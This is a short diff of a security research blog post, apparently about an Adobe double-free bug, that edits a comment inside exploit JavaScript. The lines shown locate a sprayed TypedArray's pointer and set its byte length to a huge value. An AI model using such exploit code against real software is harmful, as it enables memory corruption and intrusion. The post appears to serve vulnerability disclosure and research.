sourceincite/sourceincite.github.io/_posts/2018-05-21-adobe-me-and-a-double-free.md

                     // get a reference to TypedArray that they overwrite myarray = arr1[itmp];

-                    // get the pointer of the myarray Array mypos = biga.getUint32(i2 + 4, true) - spraypos + 0x50;
+                    // get the index to the pointer of the TypedArray mypos = biga.getUint32(i2 + 4, true) - spraypos + 0x50;

                     // set its byte length to a stupid number also